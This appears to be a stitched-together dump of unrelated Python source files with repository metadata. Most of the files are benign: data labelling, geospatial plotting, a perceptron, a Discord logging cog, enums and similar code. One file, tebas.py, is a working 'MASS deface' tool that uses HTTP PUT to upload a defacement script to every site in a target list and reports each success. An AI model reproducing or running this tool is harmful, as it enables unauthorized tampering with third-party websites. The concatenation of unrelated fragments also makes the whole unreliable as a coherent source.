'BIOGRAPHY_AUTO': 'biography',
'BIOGRAPHY_OTHER': 'biography',
'LETTERS_PRIV': 'letters',
'LETTERS_NON-PRIV': 'letters',
'HANDBOOK_OTHER': 'educ_treatise',
'EDUC_TREATISE': 'educ_treatise',
'PHILOSOPHY': 'religious',
'HISTORY': 'history',
'TRAVELOGUE': 'travelogue',
'FICTION': 'fiction',
'DRAMA_COMEDY': 'drama_comedy',
'DIARY_PRIV': 'diary_priv',
}
merge_label_to_value = {
'educ_treatise': 1, 'history': 2, 'travelogue': 3, 'fiction': 4, 'drama_comedy': 5,
'diary_priv': 6, 'science': 7, 'biography': 8, 'religious': 9, 'letters': 10, 'law':11,
}
with open(join(dirname(__file__), '..', 'labels', 'modern_english_prose_genre.csv'), mode='w') as label_f:
label_f.write(
f'verse:0,{",".join(f"{k}:{str(v)}" for k, v in merge_label_to_value.items())}\n'
)
label_f.write('Filename,Label\n')
for filename in os.listdir(join(dirname(__file__), '..', *verse_dir)):
if filename.endswith('txt'):
label_f.write(f'{"/".join(verse_dir)}/{filename},0\n')
csv_reader = csv.reader(open(join(dirname(__file__), '..', *prose_genre_label_file), mode='r'))
next(csv_reader)
for row in csv_reader:
label_f.write(
f'{"/".join(prose_dir)}/{row[0]}.txt,'
f'{merge_label_to_value[found_label_to_merge_label[row[2]]]}\n'
)
print('Success!')
if __name__ == '__main__':
main()
| 2.265625
| 2
|
srtm30_parser/map_pop_with_topo.py
|
marcwie/srtm30-parser
| 0
|
12777716
|
from sedac_gpw_parser import population
import numpy as np
from matplotlib import pyplot as plt
import matplotlib.colors as colors
import os
file_lons = np.arange(-180, 180, 40)
file_lats = np.arange(90, -20, -50)
DATA_FOLDER = os.path.expanduser("~") + "/.srtm30/"
def get_population_data(country_id):
pop = population.Population(country_id=country_id)
pop.mask_invalid_data(below=0)
data = pop.population_array()
lat = pop.latitude_range()
lon = pop.longitude_range()
lonmin = lon.min()
lonmax = lon.max()
latmax = lat.max()
latmin = lat.min()
extent = (lonmin, lonmax, latmin, latmax)
return data, extent
def get_infiles(lonmin, lonmax, latmin, latmax):
print(lonmin, lonmax, latmin, latmax)
lonmask = (file_lons >= (lonmin - 40)) & (file_lons <= lonmax)
latmask = (file_lats >= latmin) & (file_lats <= (latmax + 50))
valid_lons = file_lons[lonmask]
valid_lats = file_lats[latmask]
latmax = np.round(latmax + 1/120, 8) # Add 1/120 because topographic data is with respect to UPPER LEFT corner
latmin = np.round(latmin + 1/120, 8) # Add 1/120 because topographic data is with respect to UPPER LEFT corner
lonmin = np.round(lonmin, 8)
lonmax = np.round(lonmax, 8)
n_lat = int(np.round((latmax - latmin) * 120) + 1)
n_lon = int(np.round((lonmax - lonmin) * 120) + 1)
full_data = np.zeros((n_lat, n_lon))
lat_offset = 0
for valid_lat in valid_lats:
#print(valid_lat, end="\r")
file_lat_range = np.round(np.arange(valid_lat, valid_lat-50, -1/120), 8)
valid_file_lat_range = (file_lat_range <= latmax) & (file_lat_range >= latmin)
n_row = valid_file_lat_range.sum()
lon_offset = 0
for valid_lon in valid_lons:
file_lon_range = np.round(np.arange(valid_lon, valid_lon+40, +1/120), 8)
valid_file_lon_range = (file_lon_range <= lonmax) & (file_lon_range >= lonmin)
n_col = valid_file_lon_range.sum()
if valid_lon < 0:
lon_pref = "W"
else:
lon_pref = "E"
if valid_lat < 0:
lat_pref = "S"
else:
lat_pref = "N"
infile = lon_pref + str(abs(valid_lon)).zfill(3) + lat_pref + str(abs(valid_lat)).zfill(2) + ".DEM"
with open(DATA_FOLDER+infile) as infile:
data = np.fromfile(infile, np.dtype('>i2')).reshape(6000, 4800)
print(valid_lat, valid_lon, "cutting data")
data = data[valid_file_lat_range]
data = data[:, valid_file_lon_range]
print("storing data")
full_data[lat_offset:lat_offset+n_row,lon_offset:lon_offset+n_col]=data
lon_offset += n_col
del data
lat_offset += n_row
return full_data
def truncate_colormap(cmap, minval=0.25, maxval=1.0, n=100):
new_cmap = colors.LinearSegmentedColormap.from_list(
'trunc({n},{a:.2f},{b:.2f})'.format(n=cmap.name, a=minval, b=maxval),
cmap(np.linspace(minval, maxval, n)))
return new_cmap
def get_topomap():
colors_undersea = plt.cm.terrain(np.linspace(0, 0.17, 2))
colors_land = plt.cm.terrain(np.linspace(0.25, 1, 256))
all_colors = np.vstack((colors_undersea, colors_land))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
terrain_map = truncate_colormap(cmap=plt.get_cmap('terrain'))
terrain_map.set_under("#254DB3")
terrain_map.set_bad("0.5")
return terrain_map
def main(country_id, plot=True):
pop, extent = get_population_data(country_id=country_id)
lonmin, lonmax, latmin, latmax = extent
print("Getting topography data from disk...")
topo_data = get_infiles(lonmin, lonmax, latmin, latmax)
print("Removing empty cols")
contains_values = []
for col_id in range(pop.shape[1]):
print(col_id, pop.shape[1], end="\r")
if np.isfinite(pop[:, col_id]).any():
contains_values.append(col_id)
print(len(contains_values), pop.shape)
pop = pop[:, contains_values]
topo_data = topo_data[:, contains_values]
print("Removing empty rows")
contains_values = []
for row_id in range(pop.shape[0]):
print(row_id, pop.shape[1], end="\r")
if np.isfinite(pop[row_id]).any():
contains_values.append(row_id)
print(len(contains_values), pop.shape)
pop = pop[contains_values]
topo_data = topo_data[contains_values]
print("setting invalid values...")
#for i, _pop in enumerate(pop):
# print(i, len(pop), end="\r")
topo_data[np.isnan(pop)] = np.nan
print("Total population:", np.nansum(pop))
if plot:
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 9))
terrain_map = get_topomap()
ax1.imshow(topo_data, vmin=0, vmax=4000, cmap=terrain_map, rasterized=True)
ax2.imshow(pop, vmin=0, vmax=50)
plt.savefig("pop_topo.png")
return pop, topo_data
def distribution(pop, topo, return_total=False, plot=True, resolution=500,
max_elevation=20, add_noise=True):
mask = np.isfinite(topo)
topo = topo[mask]
pop = pop[mask]
# Make sure that some artifacts where elevation is negative are set to zero
topo[topo <= 0] = 0
#topo[topo == 0] += 0.5 * np.random.random((topo == 0).sum())
#topo[topo >= 0.5] += np.random.random((topo >= 0.5).sum()) - 0.5
if add_noise:
topo+= np.random.random(len(topo))
valid_topo = np.linspace(0, max_elevation, resolution)
results = np.zeros_like(valid_topo, dtype=float)
#total_population = pop.total_population()
for i, elevation in enumerate(valid_topo):
mask = topo <= elevation
#mask = topo == elevation
results[i] = pop[mask].sum()
total_population = np.sum(pop)
results /= total_population
#results = results.cumsum() / total_population
if plot:
f = plt.figure()
#plt.semilogy()
plt.plot(valid_topo, results)
plt.xlabel("Elevation x [m above sea level]")
plt.ylabel("Share of population living at or below x")
plt.savefig("population_elevation.png")
if return_total:
return valid_topo, results, total_population
else:
return valid_topo, results
if __name__ == "__main__":
pop, topo = main(840, plot=True)
distribution(pop, topo, plot=True)
| 2.859375
| 3
|
api/service/update_balance.py
|
guisteglich/EasyPay
| 0
|
12777717
|
<gh_stars>0
from hashlib import new
from sqlalchemy import false
from api.extensions.mongo import update_user
def balance_update(id, value, balance):
balance_value_updated = int(value) + int(balance)
new_values = { "$set": { "balance": balance_value_updated } }
response = update_user(id, new_values)
return response
def balance_update_payer(id, value, balance):
balance_value_updated = int(balance) - int(value)
print("valor atualizado do pagador: ", balance_value_updated)
if balance_value_updated < 0:
print("if")
return "not ok"
else:
print("entrei")
new_values = { "$set": { "balance": balance_value_updated } }
response = update_user(id, new_values)
return response
| 2.734375
| 3
|
rfv_bullet.py
|
rfernandezv/Faster-R-CNN-bullet
| 1
|
12777718
|
<filename>rfv_bullet.py<gh_stars>1-10
# importing required libraries
# https://www.analyticsvidhya.com/blog/2018/11/implementation-faster-r-cnn-python-object-detection/
import pandas as pd
import matplotlib.pyplot as plt
import cv2
from matplotlib import patches
# el orden es name, bullet (type), x1, x2, y1, y2
# read the csv file using read_csv function of pandas
train = pd.read_csv('train.csv',delimiter=";")
train.head()
# Blue color in BGR
color = (255, 0, 0)
# Line thickness of 2 px
thickness = 2
# reading single image using imread function of matplotlib
image = plt.imread('train_images/IMG_6974.JPG')
plt.imshow(image)
# Number of unique training images
train['image_names'].nunique()
# Number of classes
train['type'].value_counts()
#fig = plt.figure()
#add axes to the image
#ax = fig.add_axes([0,0,1,1])
# iterating over the image for different objects
for _,row in train[train.image_names == "IMG_6974.JPG"].iterrows():
xmin = int(row.xmin)
xmax = int(row.xmax)
ymin = int(row.ymin)
ymax = int(row.ymax)
width = xmax - xmin
height = ymax - ymin
print("xmin:"+str(xmin))
print("xmax:"+str(xmax))
print("ymin:"+str(ymin))
print("ymax:"+str(ymax))
# assign different color to different classes of objects
color = (255, 0, 0)
edgecolor = 'r'
#ax.annotate('bullet', xy=(xmax-40,ymin+20))
# add bounding boxes to the image
#rect = patches.Rectangle((xmin,ymin), width, height, edgecolor = edgecolor, facecolor = 'none')
#ax.add_patch(rect)
# Draw a rectangle with blue line borders of thickness of 2 px
image = cv2.rectangle(image, (xmin,ymin), (xmax, ymax), color, thickness)
cv2.imwrite("detected.jpg", image)
#plt.imshow(image)
data = pd.DataFrame()
data['format'] = train['image_names']
# as the images are in train_images folder, add train_images before the image name
for i in range(data.shape[0]):
data['format'][i] = 'train_images/' + data['format'][i]
# add xmin, ymin, xmax, ymax and class as per the format required
for i in range(data.shape[0]):
data['format'][i] = data['format'][i] + ',' + str(int(train['xmin'][i])) + ',' + str(int(train['ymin'][i])) + ',' + str(int(train['xmax'][i])) + ',' + str(int(train['ymax'][i])) + ',' + train['type'][i]
data.to_csv('annotate.txt', header=None, index=None, sep=' ')
| 3.390625
| 3
|
petsi/plugins/sojourntime/__init__.py
|
vadaszd/petsi
| 0
|
12777719
|
<reponame>vadaszd/petsi
""" A plugin that collects by-place sojourn time stats.
.. rubric:: Public package interface
- Class :class:`SojournTimePlugin` (see below)
.. rubric:: Internal submodules
.. autosummary::
:template: module_reference.rst
:recursive:
:toctree:
petsi.plugins.sojourntime._sojourntime
"""
from dataclasses import dataclass, field
from itertools import count
from typing import Iterator, Optional, TYPE_CHECKING
from ...util import export
from ..meters import MeterPlugin
from ._sojourntime import SojournTimeCollector, SojournTimePluginTokenObserver
if TYPE_CHECKING:
from ..interface import NoopPlaceObserver, NoopTransitionObserver
from ..._structure import Token
@export
@dataclass(eq=False)
class SojournTimePlugin(
MeterPlugin["SojournTimeCollector", "NoopPlaceObserver", "NoopTransitionObserver",
"SojournTimePluginTokenObserver"]):
""" A PetSi plugin providing by-place sojourn time stats.
The plugin collects the empirical distribution of the
time a token spends at each place of the observed Petri net,
i.e. in what percentage of the tokens seen was the per-visit and overall time
spent by the token at place j in bucket i of the histogram.
On the per-visit histograms each stay is translated into a separate increment.
The bucket is selected based on the time the token spent at the place during a single visit.
On the overall histograms one increment represents all the visits of a token at a given place.
The bucket is selected based on the cumulative time the token spent at the place during its whole life.
"""
token_id: Iterator[int] = field(default_factory=count, init=False)
def __post_init__(self):
self._collector = SojournTimeCollector(self._n)
def token_observer_factory(self, t: "Token") -> Optional[SojournTimePluginTokenObserver]:
return SojournTimePluginTokenObserver(self, t, self._places, self._clock,
self._collector, next(self.token_id)) \
if self._token_types is None or t.typ.ordinal in self._token_types else None
| 2.421875
| 2
|
moderation_module/guild_logging/guild_logging.py
|
alentoghostflame/StupidAlentoBot
| 1
|
12777720
|
from moderation_module.guild_logging.commands import guild_logging_control, send_delete_embed, send_edit_embed, \
send_joined_embed, send_remove_embed
from moderation_module.storage import GuildLoggingConfig
from alento_bot import StorageManager
from discord.ext import commands
import moderation_module.text
import logging
import discord
logger = logging.getLogger("main_bot")
# TODO: Update logging to latest standards, have feature parity of Sx4.
class GuildLoggingCog(commands.Cog, name="Logging"):
def __init__(self, storage: StorageManager):
self.storage: StorageManager = storage
self.storage.guilds.register_data_name("guild_logging_config", GuildLoggingConfig)
@commands.has_permissions(administrator=True)
@commands.command(name="guild_logging_control", aliases=["logging", ])
async def guild_logging_control(self, context: commands.Context, arg1=None, arg2=None):
logging_config = self.storage.guilds.get(context.guild.id, "guild_logging_config")
await guild_logging_control(logging_config, context, arg1, arg2)
@guild_logging_control.error
async def missing_permissions_error(self, context, error: Exception):
if isinstance(error, commands.MissingPermissions):
await context.send(moderation_module.text.MISSING_PERMISSIONS)
else:
await context.send(f"ERROR:\nType: {type(error)}\n{error}")
raise error
@commands.Cog.listener()
async def on_message_delete(self, message: discord.Message):
logging_config: GuildLoggingConfig = self.storage.guilds.get(message.guild.id, "guild_logging_config")
if logging_config.toggled_on and logging_config.log_channel_id and \
message.channel.id not in logging_config.exempt_channels and \
(logging_config.log_bots or (not logging_config.log_bots and not message.author.bot)):
await send_delete_embed(logging_config, message)
@commands.Cog.listener()
async def on_message_edit(self, before: discord.Message, after: discord.Message):
logging_config: GuildLoggingConfig = self.storage.guilds.get(after.guild.id, "guild_logging_config")
if logging_config.toggled_on and logging_config.log_channel_id and \
after.channel.id not in logging_config.exempt_channels and \
(logging_config.log_bots or (not logging_config.log_bots and not after.author.bot)) and \
before.content != after.content:
await send_edit_embed(logging_config, before, after)
@commands.Cog.listener()
async def on_member_join(self, member: discord.Member):
logging_config: GuildLoggingConfig = self.storage.guilds.get(member.guild.id, "guild_logging_config")
if logging_config.toggled_on and logging_config.log_channel_id:
await send_joined_embed(logging_config, member)
@commands.Cog.listener()
async def on_member_remove(self, member: discord.Member):
logging_config: GuildLoggingConfig = self.storage.guilds.get(member.guild.id, "guild_logging_config")
if logging_config.toggled_on and logging_config.log_channel_id:
await send_remove_embed(logging_config, member)
| 2.09375
| 2
|
src/drkns/generation/templateloading/get_generation_template_path.py
|
frantzmiccoli/drkns
| 13
|
12777721
|
import os
import re
from drkns.exception import MissingGenerationTemplateDirectoryException, \
MissingGenerationTemplateException, MultipleGenerationTemplateException
_template_directory = '.drknsgeneration'
_template_file_re = re.compile(r'^.*\.template\..*$')
def get_generation_template_path(from_path: str) -> str:
template_directory = os.path.join(from_path, _template_directory)
if not os.path.exists(template_directory):
error_message = template_directory + ' directory can not be found'
raise MissingGenerationTemplateDirectoryException(error_message)
contained_files = os.listdir(template_directory)
matched_files = []
for contained_file in contained_files:
pattern_match = \
_template_file_re.match(contained_file)
if pattern_match is None:
continue
matched_files.append(contained_file)
if len(matched_files) == 0:
error_message = 'No template found in ' + template_directory
raise MissingGenerationTemplateException(error_message)
if len(matched_files) > 1:
error_message = 'Multiple template found in ' + \
template_directory + ': ' + ', '.join(matched_files)
MultipleGenerationTemplateException(error_message)
return os.path.join(template_directory, matched_files.pop())
| 2.625
| 3
|
tebas.py
|
Jack007notabohu/Webdav-
| 0
|
12777722
|
<filename>tebas.py<gh_stars>0
#create BY Jack007
#-*- coding: utf-8 -*-
try:
import requests
import os.path
import sys
except ImportError:
exit("install requests and try again ...")
banner = """
``````````
`/- ```..`.`....`..``` `//.
--hm: ``.```` `` `` `` ````.`` +Ny-:
-d/ms/ `.` ```````++sy.`````` `.``+sh+d.
`:dy/yh.`. `` ` --sh` ` `` .`-hy/ms+`
d/dhy+ .` ```.````` .- `````.``` `. oydssy
`Msood-`` . .````ss````. . ``:do/hN
-mhhd- . ` ` .. . ` . :dddh/
-h:ms+: .`````.````.`+:-ss-:+`.``````````. /+om.m.
.No/oN` . ```oshmNM.`oo`.MNmhso``` . `Ns-yN`
`sM+M+. . .+MMMMMM` oo `MMMMMM+. . -+MsM+`
.++dm.h `. .mMMMMMMo dd oMMMMMMm. .` d.dd:y.
yd/++N` `````/MMMMMMMM+mm+MMMMMMMM/````` .M+/omo
oNhoM:o``. yMMMMMMMMMMMMMMMMMMMMy .`.s:Momd/
-++hmoom` .`mMMMMMMMMMMMMMMMMMMMMm`. .N+sms/o.
-hyoo-Nh--.MMMMMMMMMMMMMMMMMMMMMM.:-hm-osdy.
:ymmhmoshyNMMMMMMMMMMMMMMMMMMNydssmdNds.
./ooss++dddNMMMMMMMMMMMMMMNmddoossoo/.
./yhhhyooNMMMMMMMMMMMMMMmoosyyys:`
`:+shmNMMMMMMMMMMMMMMMMmmhyo/`
:MMMMMMMMMMMMMMMM:
`:+syhdmmmmdhys+:`
MASS deface BY
Jack007
visit my blog for tutorial
https://Jack007notabohu.my.id
"""
b = '\033[31m'
h = '\033[32m'
m = '\033[00m'
def x(tetew):
ipt = ''
if sys.version_info.major > 2:
ipt = input(tetew)
else:
ipt = raw_input(tetew)
return str(ipt)
def aox(script,target_file="target.txt"):
op = open(script,"r").read()
with open(target_file, "r") as target:
target = target.readlines()
s = requests.Session()
print("uploading file to %d website"%(len(target)))
for web in target:
try:
site = web.strip()
if site.startswith("http://") is False:
site = "http://" + site
req = s.put(site+"/"+script,data=op)
if req.status_code < 200 or req.status_code >= 250:
print(m+"["+b+" FAILED!"+m+" ] %s/%s"%(site,script))
else:
print(m+"["+h+" SUCCESS"+m+" ] %s/%s"%(site,script))
except requests.exceptions.RequestException:
continue
except KeyboardInterrupt:
print; exit()
def main(__bn__):
print(__bn__)
while True:
try:
a = x("Enter your script deface name: ")
if not os.path.isfile(a):
print("file '%s' not found"%(a))
continue
else:
break
except KeyboardInterrupt:
print; exit()
aox(a)
if __name__ == "__main__":
main(banner)
| 2
| 2
|
make_data/traffic/make_traffic_data.py
|
ricosr/travel_consult_chatbot
| 0
|
12777723
|
# -*- coding: utf-8 -*-
from traffic_templates import *
def clean_traffic_data1(term_file):
with open(term_file, 'r', encoding="utf-8") as fpr:
terms_temp_ls = fpr.readlines()
terms_ls = [term2.strip() for term2 in terms_temp_ls]
return terms_ls
def create_traffic_data(term_file, output_file):
terms_ls = []
terms_ls.extend(clean_traffic_data1(term_file))
temp_result = ''
for traffic_term in list(set(terms_ls)):
temp_result += traffic_template1.format(destination=traffic_term).strip() + '\n'
for i in range(len(terms_ls)):
if i == len(terms_ls) - 1:
break
temp_result += traffic_template2.format(departure=terms_ls[i], destination=terms_ls[i+1]).strip() + '\n'
with open(output_file, 'w', encoding="utf-8") as fpw:
fpw.write("## intent:consult_traffic\n")
fpw.write(temp_result)
with open("traffic_terms.txt", 'w', encoding="utf-8") as fpw2:
for term in terms_ls:
fpw2.write(term + '\n')
def create_traffic_data2(term_file, vehicle_terms, output_file, data_count):
vehicle_terms = clean_traffic_data1(vehicle_terms)
terms_ls = []
terms_ls.extend(clean_traffic_data1(term_file))
len_ls1 = len(traffic_template_ls_1a) + len(traffic_template_ls_1b) + len(traffic_template_ls_1c)
len_ls2 = len(traffic_template_ls2)
count1a = int(data_count * len(traffic_template_ls_1a)/(len_ls1+len_ls2))
count1b = int(data_count * len(traffic_template_ls_1b)/(len_ls1+len_ls2))
count1c = int(data_count * len(traffic_template_ls_1c)/(len_ls1+len_ls2))
count2 = int(data_count * len_ls2/(len_ls1+len_ls2))
# print(count1a, count1b, count2)
temp_result = ''
traffic_ls2 = traffic_template_ls2 * (count2 // len_ls2)
temp_result += '\n'.join(traffic_ls2) + '\n'
traffic_ls_1a = traffic_template_ls_1a * (count1a // len(traffic_template_ls_1a))
traffic_ls_1b = traffic_template_ls_1b * (count1b // len(traffic_template_ls_1b))
traffic_ls_1c = traffic_template_ls_1c * (count1c // len(traffic_template_ls_1c))
i = 0
j = 0
for traffic_template in traffic_ls_1a:
if j == len(terms_ls):
j = 0
if i == len(vehicle_terms):
i = 0
temp_result += traffic_template.format(destination=terms_ls[j], vehicle=vehicle_terms[i]) + '\n'
i += 1
j += 1
i = 0
j = 0
for traffic_template in traffic_ls_1b:
if j >= len(terms_ls):
j = 0
if i == len(vehicle_terms):
i = 0
temp_result += traffic_template.format(departure=terms_ls[j], destination=terms_ls[j+1], vehicle=vehicle_terms[i]) + '\n'
i += 1
j += 2
j = 0
for traffic_template in traffic_ls_1c:
if j >= len(terms_ls):
j = 0
temp_result += traffic_template.format(departure=terms_ls[j], destination=terms_ls[j + 1]) + '\n'
j += 2
with open(output_file, 'w', encoding="utf-8") as fpw:
fpw.write("## intent:consult_traffic\n")
fpw.write(temp_result)
with open("traffic_terms.txt", 'w', encoding="utf-8") as fpw2:
for term in terms_ls+vehicle_terms:
fpw2.write(term + '\n')
# create_traffic_data("beijing_spots", "traffic_train_data.md")
create_traffic_data2("beijing_spots", "vehicle", "traffic_train_data8.md", 8000)
| 2.78125
| 3
|
deepl/enums.py
|
sorbatti/deepl.py
| 0
|
12777724
|
<gh_stars>0
from enum import Enum
__all__ = [
'SourceLang',
'TargetLang',
'SplitSentences',
'PreserveFormatting',
'Formality'
]
class SourceLang(Enum):
Bulgarian = 'BG'
Czech = 'CS'
Danish = 'DA'
German = 'DE'
Greek = 'EL'
English = 'EN'
Spanish = 'ES'
Estonian = 'ET'
Finnish = 'FI'
French = 'FR'
Hungarian = "HU"
Italian = "IT"
Japanese = "JA"
Lithuanian = "LT"
Latvian = "LV"
Dutch = "NL"
Polish = "PL"
Portuguese = "PT"
Romanian = "RO"
Russian = "RU"
Slovak = "SK"
Slovenian = "SL"
Swedish = "SV"
Chinese = "ZH"
class TargetLang(Enum):
Bulgarian = 'BG'
Czech = 'CS'
Danish = 'DA'
German = 'DE'
Greek = 'EL'
English = 'EN'
English_GB = 'EN-GB'
English_US = 'EN-US'
Spanish = 'ES'
Estonian = 'ET'
Finnish = 'FI'
French = 'FR'
Hungarian = 'HU'
Italian = 'IT'
Japanese = 'JA'
Lithuanian = 'LT'
Latvian = 'LV'
Dutch = 'NL'
Polish = 'PL'
Portuguese = 'PT-PT'
Portuguese_BR = 'PT-BR'
Portuguese_PT = 'PT'
Romanian = 'RO'
Russian = 'RU'
Slovak = 'SK'
Slovenian = 'SL'
Swedish = 'SV'
Chinese = 'ZH'
class SplitSentences(Enum):
enabled = 0
disabled = 1
nonewlines = 'nonewlines'
class PreserveFormatting(Enum):
respect = 1
ignore = 2
class Formality(Enum):
default = 'default'
more = 'more'
less = 'less'
class FileStatus(Enum):
queued = 'queued'
translating = 'translating'
done = 'done'
error = 'error'
| 2.3125
| 2
|
Assignment-1/hw1_perceptron.py
|
ZhangShiqiu1993/CSCI-567-machine-learning
| 0
|
12777725
|
from __future__ import division, print_function
from typing import List, Tuple, Callable
import numpy as np
import scipy
import matplotlib.pyplot as plt
class Perceptron:
def __init__(self, nb_features=2, max_iteration=10, margin=1e-4):
'''
Args :
nb_features : Number of features
max_iteration : maximum iterations. You algorithm should terminate after this
many iterations even if it is not converged
margin is the min value, we use this instead of comparing with 0 in the algorithm
'''
self.nb_features = nb_features
self.w = [0 for i in range(0,nb_features+1)]
self.margin = margin
self.max_iteration = max_iteration
def train(self, features: List[List[float]], labels: List[int]) -> bool:
'''
Args :
features : List of features. First element of each feature vector is 1
to account for bias
labels : label of each feature [-1,1]
Returns :
True/ False : return True if the algorithm converges else False.
'''
seq = [x for x in range(len(features))]
threshold = self.margin / 2
converge = False
scale = np.linalg.norm(features)
for iteration in range(self.max_iteration):
if converge:
break
converge = True
np.random.shuffle(seq)
for i in seq:
pred = np.dot(self.w, features[i])
y = 0
if pred > threshold:
y = 1
elif pred < -threshold:
y = -1
if y != labels[i]:
self.w = np.add(self.w, np.dot(labels[i], features[i]))
converge = False
self.w = self.w.tolist()
return converge
def reset(self):
self.w = [0 for i in range(0,self.nb_features+1)]
def predict(self, features: List[List[float]]) -> List[int]:
'''
Args :
features : List of features. First element of each feature vector is 1
to account for bias
Returns :
labels : List of integers of [-1,1]
'''
return np.apply_along_axis(lambda x : 1 if np.dot(self.w, x) > 0 else -1, 1, features)
def get_weights(self) -> List[float]:
return self.w
| 3.71875
| 4
|
onmydesk/forms/__init__.py
|
myollie/django-onmydesk
| 0
|
12777726
|
from . import fields
__all__ = ('fields',)
| 1.085938
| 1
|
saleor/plugins/sendgrid/__init__.py
|
greentornado/saleor
| 3
|
12777727
|
<gh_stars>1-10
from dataclasses import dataclass
from typing import Optional
@dataclass
class SendgridConfiguration:
api_key: Optional[str]
sender_name: Optional[str]
sender_address: Optional[str]
account_confirmation_template_id: Optional[str]
account_set_customer_password_template_id: Optional[str]
account_delete_template_id: Optional[str]
account_change_email_confirm_template_id: Optional[str]
account_change_email_request_template_id: Optional[str]
account_password_reset_template_id: Optional[str]
invoice_ready_template_id: Optional[str]
order_confirmation_template_id: Optional[str]
order_confirmed_template_id: Optional[str]
order_fulfillment_confirmation_template_id: Optional[str]
order_fulfillment_update_template_id: Optional[str]
order_payment_confirmation_template_id: Optional[str]
order_canceled_template_id: Optional[str]
order_refund_confirmation_template_id: Optional[str]
| 1.929688
| 2
|
modules/selfserve/files/selfserve/lib/selfserve/email.py
|
mshuler/infrastructure-puppet
| 1
|
12777728
|
<reponame>mshuler/infrastructure-puppet
#!/usr/bin/python
#
# Library logic for selfserve ss2: email.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
######################################################################
import logging
import os
import re
import smtplib
import socket
import time
import StringIO
import ezt
from ss2config import *
import selfserve.keys
import selfserve.ldap
import selfserve.tokens
import selfserve.util
logger = logging.getLogger("%s.lib.email" % LOGGER_NAME)
def _hostname():
return socket.gethostbyaddr(socket.gethostname())[0]
def _make_msgid():
return "%s.%s@%s" % \
(time.strftime('%Y%m%d%H%M%S'), selfserve.util.get_hexed_random_bytes(6), _hostname())
def _maybe_encrypt_rfc822(rfc822text, fingerprints, keys):
rfc822lines = rfc822text.splitlines(True)
endofheaders = rfc822lines.index("\n")
headers = "".join(rfc822lines[:endofheaders])
body = "".join(rfc822lines[endofheaders+1:])
body, crypted = selfserve.keys.maybe_encrypt(body, fingerprints, keys)
return (headers + "\n" + body, crypted)
# TODO(bluesky): layering violation of LOOKUP
def send_email(availid, template_dir, remote24, base_url):
logger.info('emailing availid=%s remote24=%s', availid, remote24)
infos = selfserve.ldap.validate_existence(availid, True)
keys = selfserve.keys.fetch_key(availid)
if selfserve.ldap.unprivileged_p(availid):
hextoken, expiry = selfserve.tokens.make_token(PW_RESET_MAGIC, availid, cookie=remote24)
else:
# root@ cannot reset their passwords. (Use ../maint/changepw.py instead.)
# Proceed normally, but without actually creating a token.
hextoken, expiry = (selfserve.util.get_hexed_random_bytes(TOKEN_LENGTH), int(time.time()) - 86400)
logger.warning("fabricating token=%s expiry=%d for privileged availid=%s",
hextoken, expiry, availid)
msgid = _make_msgid()
to = <EMAIL>' % availid
tdata = {
'availid' : availid,
'remote24' : remote24,
'base_url' : base_url,
'to' : to,
'fullname' : infos['fullname'],
'fromAddress': FROM_ADDRESS,
'SERVER_ADMIN' : FROM_ADDRESS,
'token' : hextoken,
'deadline' : time.strftime(TIME_FMT, time.gmtime(expiry)),
'message_id' : msgid,
}
template = ezt.Template(os.path.join(template_dir, 'resetpassword.email'),
compress_whitespace=False)
buffer = StringIO.StringIO()
template.generate(buffer, tdata)
rfc822text = buffer.getvalue()
rfc822text, crypted = _maybe_encrypt_rfc822(rfc822text, infos['fingerprints'], keys)
# TODO: Update fail2ban if you change this message!
logger.warning("emailing password reset token to availid=%s message-id=<%s> remote24=%s encrypted=%s",
availid, msgid, remote24, str(crypted))
smtp = smtplib.SMTP(SMTP_HOST)
if SMTP_USER:
smtp.login(SMTP_USER, SMTP_PASSWORD)
smtp.sendmail(FROM_ADDRESS, to, rfc822text)
smtp.quit()
return msgid
if __name__ == '__main__':
import sys
raise Exception("Wrong invocation for %s as __main__" % sys.argv[0])
| 1.84375
| 2
|
exercise00/start.py
|
tschibu/hslu-ipcv-exercises
| 1
|
12777729
|
# -*- coding: utf-8 -*-
#!/usr/bin/python3
"""
"""
# =============================================================================
# Imports
# =============================================================================
import cv2
import numpy as np
import matplotlib as mpl
from matplotlib import pyplot as plt
# Matplot-Params
# Change size from Plots
plt.rcParams['font.size'] = 6
plt.rcParams['figure.dpi']= 100
plt.rcParams['lines.linewidth']= 1
# read img file
image = cv2.imread("data/lena_std.tiff")
# plot image
plt.imshow(image)
plt.show()
image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
plt.imshow(image_rgb)
plt.show()
print(image_rgb[0, 0]) # RGB value at pixel (0,0)
print(image_rgb[0, 0, 0]) # Red value (same pixel)
# y=250:280, x=250:360
image_rgb[250:280, 250:360] = [255, 255, 255]
plt.imshow(image_rgb)
plt.show()
#
image_bw = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# bw
plt.subplot(1, 2, 1)
plt.imshow(image_bw)
plt.subplot(1, 2, 2)
plt.imshow(image_rgb)
# gray
plt.subplot(1, 2, 1)
plt.imshow(image_gray, 'gray')
plt.subplot(1, 2, 2)
plt.imshow(image_rgb)
| 3.15625
| 3
|
kProcessor/kmerRow.py
|
drtamermansour/Kprocessor
| 8
|
12777730
|
class kmerRow():
kmer = str()
hashedKmer = int()
count = int()
def __init__(self, kmer, hashedKmer, count):
"""
kmerRow class constructor.
:param kmer: The kmer string
:type kmer: str
:param hashedKmer:
:type hashedKmer: int
:param count: The kmer count
:type: int
:return: kmerRow object with the predefined data.
:rtype: :class:`kProcessor.kmerRow`
"""
pass
| 3
| 3
|
base64N.py
|
thebuster0/Base64-n
| 1
|
12777731
|
<reponame>thebuster0/Base64-n
#cython: language_level=3
import stdbase64 as base64
def Encrypt(byte, loopTime, debug = False):
result = byte
if debug:
for time in range(1, loopTime + 1):
result = base64.b64encode(result)
print("Current loop time:", time)
else:
for time in range(1, loopTime + 1):
result = base64.b64encode(result)
return result
